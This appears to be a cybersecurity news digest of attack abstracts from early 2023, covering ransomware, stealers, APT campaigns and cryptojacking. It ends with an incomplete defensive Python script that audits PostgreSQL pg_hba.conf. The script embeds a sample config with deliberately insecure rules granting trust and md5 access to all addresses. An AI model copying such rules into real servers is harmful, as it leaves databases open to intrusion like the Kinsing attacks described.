Researchers discovered a new info stealer dubbed SYS01 stealer targeting critical government infrastructure and manufacturing firms. Cybersecurity researchers from Morphisec discovered a new, advanced information stealer, dubbed SYS01 stealer, ... (Security Affairs)
March 6, 2023
Ransom House ransomware attack hit Hospital Clinic de Barcelona Full Text
Abstract
Hospital Clinic de Barcelona, one of the main hospitals in the Spanish city, suffered a cyber attack that crippled its computer system. On Sunday, a ransomware attack hit the Hospital Clinic de Barcelona, one of the main hospitals of the Catalan city. ... (Security Affairs)
March 5, 2023
Credential Stuffing attack on Chick-fil-A impacted +71K users Full Text
Abstract
American fast-food restaurant chain Chick-fil-A reported that the accounts of over 71K users were compromised as a result of a credential stuffing campaign. The American fast-food restaurant chain Chick-fil-A notified over 71K users that their accounts ... (Security Affairs)
March 4, 2023
Southeastern Louisiana University ‘Likely’ Suffered Cyber Attack Full Text
Abstract
Southeastern Louisiana University suffered a week-long outage of its website, email, and system for submitting assignments after a "potential incident" last week caused the university to shut down its network. (Cyware)
March 3, 2023
Hundreds of thousands of websites hacked as part of redirection campaign Full Text
Abstract
Thousands of Websites Hijacked Using Compromised FTP Credentials: Researchers reported that threat actors compromised thousands of websites using legitimate FTP credentials to hijack traffic. Cybersecurity firm Wiz reported that since early September ... (Security Affairs)
March 3, 2023
Poland Blames Russian Hackers for Cyberattack on Tax Service Website Full Text
Abstract
The distributed denial-of-service (DDoS) attack occurred on Tuesday, causing the website to crash for approximately one hour and blocking users’ access to the online tax filing system. (Cyware)
March 2, 2023
Cryptojacking campaign targets insecure deployments of Redis servers Full Text
Abstract
Researchers from Cado Security discovered a cryptojacking campaign targeting misconfigured Redis database servers. Cado Labs researchers recently discovered a new cryptojacking campaign targeting insecure deployments of Redis database servers. Threat ... (Security Affairs)
March 2, 2023
Pierce Transit and City of Lakewood Investigating Potential Ransomware Attacks Full Text
Abstract
A Pierce Transit spokesperson told KOMO News in a statement that on Feb. 14, the agency "experienced a ransomware incident that temporarily disrupted some agency systems." (Cyware)
March 2, 2023
Threat actors target law firms with GootLoader and SocGholish malware Full Text
Abstract
Cyber criminals are targeting law firms with GootLoader and FakeUpdates (aka SocGholish) malware families. Researchers from eSentire have foiled 10 cyberattacks targeting six different law firms throughout January and February of 2023. The firms ... (Security Affairs)
February 28, 2023
U.S. Marshals Service suffers a ransomware attack Full Text
Abstract
The U.S. Marshals Service (USMS) was the victim of a ransomware attack, and it is investigating the theft of sensitive information. The U.S. Marshals Service (USMS) announced that a ransomware attack has impacted "a stand-alone USMS system." The US bureau ... (Security Affairs)
February 27, 2023
Thousands of Cloud Servers Targeted by the Mysterious Nevada Group Full Text
Abstract
An unidentified group of ransomware hackers, dubbed Nevada Group, has targeted the computer networks of almost 5,000 victims across the U.S. and Europe. Hackers ask for two Bitcoins (which is around $50,000) and their ransom notes are publicly visible. The CISA has released a simple workaround ... (Cyware)
February 27, 2023
Nine Danish Hospitals Suffer Cyberattack From ‘Anonymous Sudan’ Full Text
Abstract
Copenhagen’s health authority said on Twitter that although the websites for the hospitals were down, medical care at the facilities was unaffected by the attacks. It later added the sites were back online after “a couple of hours.” (Cyware)
February 27, 2023
PureCrypter Malware Targets Government Entities in Asia-Pacific and North America Full Text
Abstract
Government entities in Asia-Pacific and North America are being targeted by an unknown threat actor with an off-the-shelf malware downloader known as PureCrypter to deliver an array of information stealers and ransomware. "The PureCrypter campaign uses the domain of a compromised non-profit organization as a command-and-control (C2) to deliver a secondary payload," Menlo Security researcher Abhay Yadav said. The different types of malware propagated using PureCrypter include RedLine Stealer, Agent Tesla, Eternity, Blackmoon (aka KRBanker), and Philadelphia ransomware. First documented in June 2022, PureCrypter is advertised for sale by its author for $59 for one-month access (or $245 for a one-off lifetime purchase) and is capable of distributing a multitude of malware. In December 2022, PureCoder – the developer behind the program – expanded the slate of offerings to include a logger and information stealer known as PureLogs, which is designed to si... (The Hacker News)
February 27, 2023
PlugX Trojan Disguised as Legitimate Windows Debugger Tool in Latest Attacks Full Text
Abstract
The PlugX remote access trojan has been observed masquerading as an open source Windows debugger tool called x64dbg in an attempt to circumvent security protections and gain control of a target system. "This file is a legitimate open-source debugger tool for Windows that is generally used to examine kernel-mode and user-mode code, crash dumps, or CPU registers," Trend Micro researchers Buddy Tancio, Jed Valderama, and Catherine Loveria said in a report published last week. PlugX, also known as Korplug, is a post-exploitation modular implant, which, among other things, is known for its multiple functionalities such as data exfiltration and its ability to use the compromised machine for nefarious purposes. Although first documented a decade ago in 2012, early samples of the malware date as far as February 2008, according to a Trend Micro report at the time. Over the years, PlugX has been used by threat actors with a Chinese nexus as well as cybercrime groups. On ... (The Hacker News)
February 25, 2023
Clasiopa group targets materials research in Asia Full Text
Abstract
A previously unknown threat actor, tracked as Clasiopa, is using a distinct toolset in attacks aimed at materials research organizations in Asia. Broadcom Symantec researchers have reported that a previously unknown threat actor, tracked as Clasiopa, ... (Security Affairs)
February 22, 2023
Direct Kernel Object Manipulation (DKOM) Attacks on ETW Providers Full Text
Abstract
ETW is a high-speed tracing facility built into the Windows operating system. It enables the logging of events and system activities by applications, drivers, and the operating system. (Cyware)
February 20, 2023
A sophisticated threat actor hit cryptocurrency exchange Coinbase Full Text
Abstract
The Coinbase cryptocurrency exchange was the victim of a sophisticated cyberattack; experts believe it was targeted by the Twilio hackers. A sophisticated threat actor launched a smishing campaign against the employees of the cryptocurrency exchange Coinbase. According ... (Security Affairs)
February 20, 2023
Lockbit Ransomware Gang Hit the Portuguese Municipal Water Utility Aguas do Porto Full Text
Abstract
Lockbit added the municipal water utility company to the list of victims on its Tor leak site; the deadline is March 07, 2023. CNN Portugal confirmed that the National Cybersecurity Center and the Judiciary Police are investigating the breach. (Cyware)
February 20, 2023
Google Reveals Alarming Surge in Russian Cyber Attacks Against Ukraine Full Text
Abstract
Russia's cyber attacks against Ukraine surged by 250% in 2022 when compared to two years ago, Google's Threat Analysis Group (TAG) and Mandiant disclosed in a new joint report. The targeting, which coincided and has since persisted following the country's military invasion of Ukraine in February 2022, focused heavily on the Ukrainian government and military entities, alongside critical infrastructure, utilities, public services, and media sectors. Mandiant said it observed "more destructive cyber attacks in Ukraine during the first four months of 2022 than in the previous eight years with attacks peaking around the start of the invasion." As many as six unique wiper strains – including WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, Industroyer2, and SDelete – have been deployed against Ukrainian networks, suggesting a willingness on the part of Russian threat actors to forgo persistent access. Phishing attacks aimed at NATO countries witnessed a 3... (The Hacker News)
February 20, 2023
Cyber Espionage Group Earth Kitsune Deploys WhiskerSpy Backdoor in Latest Attacks Full Text
Abstract
The cyber espionage threat actor tracked as Earth Kitsune has been observed deploying a new backdoor called WhiskerSpy as part of a social engineering campaign. Earth Kitsune, active since at least 2019, is known to primarily target individuals interested in North Korea with self-developed malware such as dneSpy and agfSpy. Previously documented intrusions have entailed the use of watering holes that leverage browser exploits in Google Chrome and Internet Explorer to activate the infection chain. The differentiating factor in the latest attacks is a shift to social engineering to trick users into visiting compromised websites related to North Korea, according to a new report from Trend Micro released last week. The cybersecurity company said the website of an unnamed pro-North Korean organization was hacked and modified to distribute the WhiskerSpy implant. The compromise was discovered at the end of last year. "When a targeted visitor tries to watch videos on the websit... (The Hacker News)
February 20, 2023
Hackers Target Chinese Speaking Individuals via Poisoned Google Search Full Text
Abstract
Security analysts at ESET unearthed a malware campaign targeting Chinese-speaking people in Southeast and East Asia. The unknown hacker group has created copycat websites of popular apps, such as Firefox, WhatsApp, and Telegram. Along with legitimate software, cyber foes also deliver FatalRAT to ta ... (Cyware)
February 20, 2023
Lockbit ransomware gang hit the Portuguese municipal water utility Aguas do Porto Full Text
Abstract
The LockBit ransomware gang claims to have hacked Aguas do Porto, a Portuguese municipal water utility company. The LockBit ransomware gang claims to have hacked Aguas do Porto, a Portuguese municipal water utility company, and is threatening to leak ... (Security Affairs)
February 17, 2023
Armenian Entities Hit by New Version of OxtaRAT Spying Tool Full Text
Abstract
Entities in Armenia have come under a cyber attack using an updated version of a backdoor called OxtaRAT that allows remote access and desktop surveillance. "The tool capabilities include searching for and exfiltrating files from the infected machine, recording the video from the web camera and desktop, remotely controlling the compromised machine with TightVNC, installing a web shell, performing port scanning, and more," Check Point Research said in a report. The latest campaign is said to have commenced in November 2022 and marks the first time the threat actors behind the activity have expanded their focus beyond Azerbaijan. "The threat actors behind these attacks have been targeting human rights organizations, dissidents, and independent media in Azerbaijan for several years," the cybersecurity firm noted, calling the campaign Operation Silent Watch. The late 2022 intrusions are significant, not least because of the changes in the infection chain, the s... (The Hacker News)
February 16, 2023
Researchers Link SideWinder Group to Dozens of Targeted Attacks in Multiple Countries Full Text
Abstract
The prolific SideWinder group has been attributed as the nation-state actor behind attempted attacks against 61 entities in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka between June and November 2021. Targets included government, military, law enforcement, banks, and other organizations, according to an exhaustive report published by Group-IB, which also found links between the adversary and two other intrusion sets tracked as Baby Elephant and DoNot Team. SideWinder is also referred to as APT-C-17, Hardcore Nationalist (HN2), Rattlesnake, Razor Tiger, and T-APT4. It's suspected to be of Indian origin, although Kaspersky in 2022 noted that the attribution is no longer deterministic. The group has been linked to no less than 1,000 attacks against government organizations in the Asia-Pacific region since April 2020, according to a report from the Russian cybersecurity firm early last year. Of the 61 potential targets compiled by Group-IB, 29 of them are located ... (The Hacker News)
February 15, 2023
City of Oakland issued a local state of emergency after recent ransomware attack Full Text
Abstract
The City of Oakland has declared a local state of emergency due to the effect of the ransomware attack that hit the city on February 8, 2023. The City of Oakland disclosed last week a ransomware attack; the security breach began on February 8, 2023. ... (Security Affairs)
February 15, 2023
Tonga is the latest Pacific Island nation hit with ransomware Full Text
Abstract
Tonga Communications Corporation (TCC) — one of two telecoms companies in the country — published a notice on Facebook saying the attack may slow down administrative operations. (Cyware)
February 14, 2023
11,000 WordPress Sites Hacked in a Backdoor Attack Full Text
Abstract
According to Sucuri’s research, the backdoor redirects users to sites that show fraudulent views of Google AdSense ads. The company’s SiteCheck remote scanner has detected more than 10,890 infected sites. (Cyware)
February 14, 2023
GoAnywhere Zero-Day Attack Victims Start Disclosing Significant Impact Full Text
Abstract
In an SEC filing, Community Health Systems (CHS), one of the largest US healthcare services providers, revealed that a “security breach experienced by Fortra” resulted in the exposure of personal info and PHI belonging to patients of CHS affiliates. (Cyware)
February 14, 2023
Chinese Hackers Targeting South American Diplomatic Entities with ShadowPad Full Text
Abstract
Microsoft on Monday attributed a China-based cyber espionage actor to a set of attacks targeting diplomatic entities in South America. The tech giant's Security Intelligence team is tracking the cluster under the emerging moniker DEV-0147, describing the activity as an "expansion of the group's data exfiltration operations that traditionally targeted government agencies and think tanks in Asia and Europe." The threat actor is said to use established hacking tools such as ShadowPad to infiltrate targets and maintain persistent access. ShadowPad, also called PoisonPlug, is a successor to the PlugX remote access trojan and has been widely put to use by Chinese adversarial collectives with links to the Ministry of State Security (MSS) and People's Liberation Army (PLA), per Secureworks. One of the other malicious tools utilized by DEV-0147 is a webpack loader called QuasarLoader, which allows for deploying additional payloads onto the compromised hosts. (The Hacker News)
February 14, 2023
Massive HTTP DDoS Attack Hits Record High of 71 Million Requests/Second Full Text
Abstract
Web infrastructure company Cloudflare on Monday disclosed that it thwarted a record-breaking distributed denial-of-service (DDoS) attack that peaked at over 71 million requests per second (RPS). "The majority of attacks peaked in the ballpark of 50-70 million requests per second (RPS) with the largest exceeding 71 million," the company said, calling it a "hyper-volumetric" DDoS attack. It's also the largest HTTP DDoS attack reported to date, more than 35% higher than the previous 46 million RPS DDoS attack that Google Cloud mitigated in June 2022. Cloudflare said the attacks singled out websites secured by its platform and that they emanated from a botnet comprising more than 30,000 IP addresses that belonged to "numerous" cloud providers. Targeted websites included a popular gaming provider, cryptocurrency companies, hosting providers, and cloud computing platforms. HTTP attacks of this kind are designed to send a tsunami of HTTP requests t... (The Hacker News)
February 14, 2023
New MortalKombat Ransomware and Laplas Clipper Malware Threats Deployed in Recent Attacks Full Text
Abstract
Talos observed the actor scanning the internet for victim machines with an exposed remote desktop protocol (RDP) port 3389, using one of their download servers that runs an RDP crawler and also facilitates MortalKombat ransomware. (Cyware)
February 14, 2023
Hackers Target Bahrain Airport, State News Agency Sites to Mark Uprising Full Text
Abstract
Hackers said they had taken down the websites of Bahrain’s international airport and state news agency on Tuesday to mark the 12-year anniversary of an Arab Spring uprising in the small Gulf country. (Cyware)
February 13, 2023
Chinese Tonto Team Hackers’ Second Attempt to Target Cybersecurity Firm Group-IB Fails Full Text
Abstract
The advanced persistent threat (APT) actor known as Tonto Team carried out an unsuccessful attack on cybersecurity company Group-IB in June 2022. The Singapore-headquartered firm said that it detected and blocked malicious phishing emails originating from the group targeting its employees. It's also the second attack aimed at Group-IB, the first of which took place in March 2021. Tonto Team, also called Bronze Huntley, Cactus Pete, Earth Akhlut, Karma Panda, and UAC-0018, is a suspected Chinese hacking group that has been linked to attacks targeting a wide range of organizations in Asia and Eastern Europe. The actor is known to be active since at least 2009 and is said to share ties to the Third Department (3PLA) of the People's Liberation Army's Shenyang TRB (Unit 65016). Attack chains involve spear-phishing lures containing malicious attachments created using the Royal Road Rich Text Format (RTF) exploitation toolkit to drop backdoors like Bisonal, Dexbi... (The Hacker News)
February 12, 2023
The Israel Institute of Technology Technion suffered a ransomware attack Full Text
Abstract
The Technion – Israel Institute of Technology was breached on Sunday by a new anti-Israel threat actor calling itself DarkBit. Technion – Israel Institute of Technology is Israel's top technology research university and a leading center for cyber ... (Security Affairs)
February 11, 2023
Clop ransomware claims the hack of 130 orgs using GoAnywhere MFT flaw Full Text
Abstract
The Clop ransomware group claims to have breached over 130 organizations exploiting the GoAnywhere MFT zero-day. The Clop ransomware group claims to have stolen sensitive data from over 130 organizations by exploiting a zero-day vulnerability (CVE-2023-0669) ... (Security Affairs)
February 10, 2023
Ransomware attack hit the City of Oakland Full Text
Abstract
A ransomware attack hit the City of Oakland this week, forcing it to take all systems offline in response to the incident. The City of Oakland disclosed a ransomware attack; the security breach began on Wednesday night. In an abundance of caution, ... (Security Affairs)
February 9, 2023
QakNote Campaign Leverages OneNote to Infect Victims with QBot Full Text
Abstract
A large-scale QakNote campaign is ongoing that drops the QBot banking trojan on systems via malicious Microsoft OneNote attachments. The phishing emails contain OneNote files that have an embedded HTML application (HTA file) that retrieves the QBot malware payload. The adoption signals “a much more aut ... (Cyware)
February 08, 2023
Russian Hackers Using Graphiron Malware to Steal Data from Ukraine Full Text
Abstract
A Russia-linked threat actor has been observed deploying a new information-stealing malware in cyber attacks targeting Ukraine. Dubbed Graphiron by Broadcom-owned Symantec, the malware is the handiwork of an espionage group known as Nodaria, which is tracked by the Computer Emergency Response Team of Ukraine (CERT-UA) as UAC-0056. "The malware is written in Go and is designed to harvest a wide range of information from the infected computer, including system information, credentials, screenshots, and files," the Symantec Threat Hunter Team said in a report shared with The Hacker News. Nodaria was first spotlighted by CERT-UA in January 2022, calling attention to the adversary's use of SaintBot and OutSteel malware in spear-phishing attacks targeting government entities. The group, which is said to be active since at least April 2021, has since repeatedly deployed custom backdoors such as GraphSteel and GrimPlant in various campaigns since Russia's ... (The Hacker News)
February 8, 2023
Ransomware Attacks Target VMware ESXi Servers Worldwide Full Text
Abstract
Threats surrounding VMware ESXi servers have multiplied. At least two ransomware variants, including Royal Ransomware and ESXiArgs, were found launching attacks on the servers. The latter exploits an old VMware flaw, identified as CVE-2021-21974. With this, they have joined the likes of Black B ... (Cyware)
February 7, 2023
British Steel Industry Supplier Vesuvius Suffers Cyber Incident Full Text
Abstract
The British manufacturer confirmed that the incident “involved unauthorized access to our systems,” although it did not provide further details on what the access was or what kind of cyber actor may have been responsible. (Cyware)
February 7, 2023
VMware has no evidence of zero-day exploitation in ESXiArgs ransomware attacks Full Text
Abstract
VMware said there is no evidence that threat actors are exploiting a zero-day flaw in its software as part of an ongoing ESXiArgs ransomware campaign. VMware said that it found no evidence that the threat actors behind the ongoing ESXiArgs ransomware ... (Security Affairs)
February 7, 2023
Massachusetts-Based MKS Instruments Falls Victim to Ransomware Attack Full Text
Abstract
The company said it has notified law enforcement authorities while it investigates and assesses the impact of the incident by engaging “appropriate incident response professionals.” (Cyware)
February 07, 2023
VMware Finds No Evidence of 0-Day in Ongoing ESXiArgs Ransomware Spree Full Text
Abstract
VMware on Monday said it found no evidence that threat actors are leveraging an unknown security flaw, i.e., a zero-day, in its software as part of an ongoing ransomware attack spree worldwide. "Most reports state that End of General Support (EoGS) and/or significantly out-of-date products are being targeted with known vulnerabilities which were previously addressed and disclosed in VMware Security Advisories (VMSAs)," the virtualization services provider said. The company is further recommending users to upgrade to the latest available supported releases of vSphere components to mitigate known issues and disable the OpenSLP service in ESXi. "In 2021, ESXi 7.0 U2c and ESXi 8.0 GA began shipping with the service disabled by default," VMware added. The announcement comes as unpatched and unsecured VMware ESXi servers around the world have been targeted in a large-scale ransomware campaign dubbed ESXiArgs by likely exploiting a two-year-old bug VMware p... (The Hacker News)
February 6, 2023
Hackers Target Switzerland’s Largest University With ‘Professional’ Cyberattack Full Text
Abstract
The university said on Friday that it is battling to keep the hackers out of critical zones by isolating parts of its IT system. This defense has compromised access to its systems but prevented cyberattackers from encrypting or extracting data. (Cyware)
February 04, 2023
New Wave of Ransomware Attacks Exploiting VMware Bug to Target ESXi Servers Full Text
Abstract
VMware ESXi hypervisors are the target of a new wave of attacks designed to deploy ransomware on compromised systems. "These attack campaigns appear to exploit CVE-2021-21974, for which a patch has been available since February 23, 2021," the Computer Emergency Response Team (CERT) of France said in an advisory on Friday. VMware, in its own alert released at the time, described the issue as an OpenSLP heap-overflow vulnerability that could lead to the execution of arbitrary code. "A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution," the virtualization services provider noted. French cloud services provider OVHcloud said the attacks are being detected globally with a specific focus on Europe. It's being suspected that the intrusions are related to a new Rust-based ransomware strain called Nevada that emerged ... (The Hacker News)
February 2, 2023
Global Derivatives Markets Impacted by LockBit Ransomware Attack on Financial Software Company Full Text
Abstract
The attack is “impacting the trading and clearing of exchange-traded derivatives by ION customers across global markets,” according to the Futures Industry Association (FIA). (Cyware)
February 2, 2023
‘No Pineapple’ Cyber Espionage Campaign Reveals North Korean Toolkit Full Text
Abstract
A threat intelligence firm spotted North Korean hackers engaged in technological espionage in a campaign that betrayed recurring elements of the Pyongyang hacking toolkit. (Cyware)
February 1, 2023
Pro-Russia Killnet group hit Dutch and European hospitals Full Text
Abstract
The Dutch National Cyber Security Centre (NCSC) confirmed that the pro-Russia group Killnet hit websites of national and European hospitals. The Dutch National Cyber Security Centre (NCSC) reported that the websites of several hospitals in the Netherlands ... (Security Affairs)
February 01, 2023
Experts Warn of ‘Ice Breaker’ Cyberattacks Targeting Gaming and Gambling Industry Full Text
Abstract
A new attack campaign has targeted the gaming and gambling sectors since at least September 2022, just months prior to the ICE London 2023 gaming industry trade fair event that's scheduled next week. Israeli cybersecurity company Security Joes is tracking the activity cluster under the name Ice Breaker, stating the intrusions employ clever social engineering tactics to deploy a JavaScript backdoor. The attack sequence proceeds as follows: The threat actor poses as a customer while initiating a conversation with a support agent of a gaming website and urges the individual on the other end to open a screenshot image hosted on Dropbox. Security Joes said that the threat actor is "well-aware of the fact that the customer service is human-operated." Clicking the malicious link sent in the chat leads to the retrieval of an LNK payload or, alternatively, a VBScript file as a backup option, the former of which is configured to download and run an MSI package containin... (The Hacker News)
February 1, 2023
Update: LockBit takes credit for November ransomware attack on Sacramento PBS station Full Text
Abstract
The PBS station KVIE announced the attack on November 23, noting that some of its internal systems were affected on October 31. It immediately took systems offline, notified law enforcement, and hired experts to investigate the incident. (Cyware)
January 31, 2023
Ukraine Targeted via New Waves of Data Wipers, Including SwiftSlicer Full Text
Abstract
A lot has happened on the cyber front in Ukraine and Russia ever since the war began. Joining the bandwagon, on behalf of the Russian Sandworm APT, is a pack of five wiper malware, including the new Golang-based SwiftSlicer. The new wiper has been added to the VirusTotal database recently (sub ... (Cyware)
January 28, 2023
Ukraine Hit with New Golang-based ‘SwiftSlicer’ Wiper Malware in Latest Cyber Attack Full Text
Abstract
Ukraine has come under a fresh cyber onslaught from Russia that involved the deployment of a previously undocumented Golang-based data wiper dubbed SwiftSlicer. ESET attributed the attack to Sandworm, a nation-state group linked to Military Unit 74455 of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). "Once executed it deletes shadow copies, recursively overwrites files located in %CSIDL_SYSTEM%\drivers, %CSIDL_SYSTEM_DRIVE%\Windows\NTDS and other non-system drives and then reboots computer," ESET disclosed in a series of tweets. The overwrites are achieved by using randomly generated byte sequences to fill 4,096 byte-length blocks. The intrusion was discovered on January 25, 2023, the Slovak cybersecurity company added. Sandworm, also tracked under the monikers BlackEnergy, Electrum, Iridium, Iron Viking, TeleBots, and Voodoo Bear, has a history of staging disruptive and destructive cyber campaigns target... (The Hacker News)
January 27, 2023
New Wave of Database Injection Attacks Compromise WordPress Sites Full Text
Abstract
The latest wave has been active since December 26, 2022, and over 5,600 websites are impacted by it so far. It has switched from fake CAPTCHA push notification scams to black hat ad networks. (Cyware)
January 25, 2023
Massive Attack Campaign Uses Hacked WordPress Sites as Platform for Black Hat Ad Network Full Text
Abstract
PublicWWW results show over 4,500 websites impacted by this malware at the time of writing, while urlscan.io shows evidence of the campaign operating since December 26, 2022. (Cyware)
January 20, 2023
Gamaredon Group Launches Cyberattacks Against Ukraine Using Telegram Full Text
Abstract
The Russian state-sponsored cyber espionage group known as Gamaredon has continued its digital onslaught against Ukraine, with recent attacks leveraging the popular messaging app Telegram to strike military and law enforcement sectors in the country. "The Gamaredon group's network infrastructure relies on multi-stage Telegram accounts for victim profiling and confirmation of geographic location, and then finally leads the victim to the next stage server for the final payload," the BlackBerry Research and Intelligence Team said in a report shared with The Hacker News. "This kind of technique to infect target systems is new." Gamaredon, also known by names such as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and Winterflounder, is known for its assaults aimed at Ukrainian entities since at least 2013. Last month, Palo Alto Networks Unit 42 disclosed the threat actor's unsuccessful attempts to break into an unnamed petrol ... The Hacker News
January 18, 2023
Iranian Government Entities Under Attack by New Wave of BackdoorDiplomacy Attacks Full Text
Abstract
The threat actor known as BackdoorDiplomacy has been linked to a new wave of attacks targeting Iranian government entities between July and late December 2022. Palo Alto Networks Unit 42, which is tracking the activity under its constellation-themed moniker Playful Taurus, said it observed the government domains attempting to connect to malware infrastructure previously identified as associated with the adversary. Also known by the names APT15, KeChang, NICKEL, and Vixen Panda, the Chinese APT group has a history of cyber espionage campaigns aimed at government and diplomatic entities across North America, South America, Africa, and the Middle East since at least 2010. Slovak cybersecurity firm ESET, in June 2021, unpacked the intrusions mounted by the hacking crew against diplomatic entities and telecommunication companies in Africa and the Middle East using a custom implant known as Turian. Then in December 2021, Microsoft announced the seizure of 42 domains operated by ... The Hacker News
January 17, 2023
1,000 ships impacted by a ransomware attack on maritime software supplier DNV Full Text
Abstract
A ransomware attack against DNV, one of the major maritime software suppliers, impacted approximately 1,000 vessels. DNV GL provides solutions... Security Affairs
January 17, 2023
Danish Consumers Targeted by Smishing Attack Wave Full Text
Abstract
Contacted by an anonymous reader, Heimdal was made aware that numerous Danish smartphone owners have been flooded by cryptic messages from a user that goes by the moniker of “Dansk-game.”Cyware
January 14, 2023
Malware Attack on CircleCI Engineer’s Laptop Leads to Recent Security Incident Full Text
Abstract
DevOps platform CircleCI on Friday disclosed that unidentified threat actors compromised an employee's laptop and leveraged malware to steal their two-factor authentication-backed credentials to breach the company's systems and data last month. The CI/CD service said the "sophisticated attack" took place on December 16, 2022, and that the malware went undetected by its antivirus software. "The malware was able to execute session cookie theft, enabling them to impersonate the targeted employee in a remote location and then escalate access to a subset of our production systems," Rob Zuber, CircleCI's chief technology officer, said in an incident report. Further analysis of the security lapse revealed that the unauthorized third party pilfered data from a subset of its databases by abusing the elevated permissions granted to the targeted employee. This included customer environment variables, tokens, and keys. The threat actor is believed ... The Hacker News
January 13, 2023
LockBit ransomware operation behind the Royal Mail cyberattack Full Text
Abstract
The cyberattack on Royal Mail, Britain's postal service, was a ransomware attack linked to the LockBit ransomware operation. Royal Mail, the British multinational postal service and courier company, this week announced... Security Affairs
January 13, 2023
Threat actors target govt networks exploiting Fortinet SSL-VPN CVE-2022-42475 bug Full Text
Abstract
A recently patched Fortinet FortiOS SSL-VPN zero-day was exploited in attacks against government organizations and government-related targets. Fortinet researchers reported how threat actors exploited the recently patched FortiOS SSL-VPN vulnerability (CVE-2022-42475)... Security Affairs
January 13, 2023
FortiOS Flaw Exploited as Zero-Day in Attacks on Government and Organizations Full Text
Abstract
A zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting governments and other large organizations. "The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers said in a post-mortem analysis published this week. The attacks entailed the exploitation of CVE-2022-42475, a heap-based buffer overflow flaw that could enable an unauthenticated remote attacker to execute arbitrary code via specifically crafted requests. The infection chain analyzed by the company shows that the end goal was to deploy a generic Linux implant modified for FortiOS that is equipped to compromise Fortinet's intrusion prevention system (IPS) software and establish connections with a remote server to download additional malware and execute commands. Fortinet said it was unable to recover the payloads used in the ... The Hacker News
January 11, 2023
New Info-Stealer Malware Campaign Targets Italian Users Full Text
Abstract
The multi-stage infection sequence begins with a phishing email containing a link that downloads a password-protected ZIP archive file with two files: a shortcut (.LNK) file and a batch (.BAT) file.Cyware
January 11, 2023
Australian Healthcare Sector Targeted in Latest Gootkit Malware Attacks Full Text
Abstract
A wave of Gootkit malware loader attacks has targeted the Australian healthcare sector by leveraging legitimate tools like VLC Media Player. Gootkit, also called Gootloader, is known to employ search engine optimization (SEO) poisoning tactics (aka spamdexing) for initial access. It typically works by compromising and abusing legitimate infrastructure and seeding those sites with common keywords. Like other malware of its kind, Gootkit is capable of stealing data from the browser, performing adversary-in-the-browser (AitB) attacks, keylogging, taking screenshots, and other malicious actions. Trend Micro's new findings reveal that the keywords "hospital," "health," "medical," and "enterprise agreement" have been paired with various city names in Australia, marking the malware's expansion beyond accounting and law firms. The starting point of the cyber assault is to direct users searching for the same keywords to an infected ... The Hacker News
January 11, 2023
Gootkit Loader campaign targets Australian Healthcare Industry Full Text
Abstract
Trend Micro researchers warn that the Gootkit malware loader is actively targeting organizations in the Australian healthcare sector. The experts analyzed a series... Security Affairs
January 11, 2023
Lorenz Ransomware Completes its Attack After Five Months Full Text
Abstract
S-RM researchers identified a Lorenz ransomware attack that was completed months after the attackers gained initial access. They exploited CVE-2022-29499, a vulnerability in Mitel telephony infrastructure.Cyware
January 10, 2023
British Company That Supports Semiconductor Manufacturing Hit by Cyber Incident Full Text
Abstract
No explanation of the attack’s impact on its business operations has yet been disclosed, nor has the nature of the attack. The company stated it is “taking steps to ensure that its businesses can continue to trade with its customers and suppliers.”Cyware
January 10, 2023
Italian Users Warned of Malware Attack Targeting Sensitive Information Full Text
Abstract
A new malware campaign has been observed targeting Italy with phishing emails designed to deploy an information stealer on compromised Windows systems. "The info-stealer malware steals sensitive information like system info, crypto wallet and browser histories, cookies, and credentials of crypto wallets from victim machines," Uptycs security researcher Karthickkumar Kathiresan said in a report. Details of the campaign were first disclosed by Milan-based IT services firm SI.net last month. The multi-stage infection sequence commences with an invoice-themed phishing email containing a link that, when clicked, downloads a password-protected ZIP archive file harboring two files: a shortcut (.LNK) file and a batch (.BAT) file. Irrespective of which file is launched, the attack chain remains the same, as opening the shortcut file fetches the same batch script designed to install the information stealer payload from a GitHub repository. This is achieved by leveraging ... The Hacker News
January 10, 2023
San Francisco Bay Area Rapid Transit Investigating Vice Society Ransomware Attack Full Text
Abstract
While the attack did not cause any damage and no riders were put at risk, city officials raised alarms in a report because the attackers could have reached critical systems and may have left backdoors inside.Cyware
January 9, 2023
Kinsing Cryptojacking Hits Kubernetes Clusters via Misconfigured PostgreSQL Full Text
Abstract
The threat actors behind the Kinsing cryptojacking operation have been spotted exploiting misconfigured and exposed PostgreSQL servers to obtain initial access to Kubernetes environments. A second initial access vector entails the use of vulnerable images, Sunders Bruskin, security researcher at Microsoft Defender for Cloud, said in a report last week. Kinsing has a storied history of targeting containerized environments, often leveraging misconfigured open Docker daemon API ports as well as abusing newly disclosed exploits to drop cryptocurrency mining software. The threat actor has in the past also been discovered employing a rootkit to hide its presence, in addition to terminating and uninstalling competing resource-intensive services and processes. Now, according to Microsoft, misconfigurations in PostgreSQL servers have been co-opted by the Kinsing actor to gain an initial foothold, with the company observing a "large amount of clusters" infected ... The Hacker News
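The abstract above says only "misconfigured and exposed PostgreSQL servers". The classic form of that misconfiguration is a pg_hba.conf rule that grants trust (no credential at all) or cleartext password authentication to a world-wide address range, on a server whose port 5432 is reachable from outside the cluster. The Python audit script below is an added example written for this page, not code from Microsoft's report or from the Kinsing operators; the pg_hba.conf it contains is constructed, with the weak rules on lines 2 and 3 and the hardened equivalents below them.

```python
"""Audit a PostgreSQL pg_hba.conf for over-permissive authentication rules.

Added example, not code from Microsoft or the Kinsing report. The sample
file below is constructed; a real one lives in the cluster's data directory.
"""
import ipaddress
from dataclasses import dataclass

# Constructed sample. Lines 2-3 are the weak configuration (trust auth and
# md5 password auth open to every address); lines 4-6 are the hardened form.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER      ADDRESS         METHOD
host    all       all       0.0.0.0/0       trust
host    all       all       ::/0            md5
local   all       postgres                  peer
hostssl all       app       10.20.0.0/16    scram-sha-256
host    all       all       127.0.0.1/32    scram-sha-256
"""

WEAK_METHODS = {"trust", "password"}     # trust: no credential; password: cleartext
LEGACY_METHODS = {"md5"}                 # accepted, but scram-sha-256 is the modern choice
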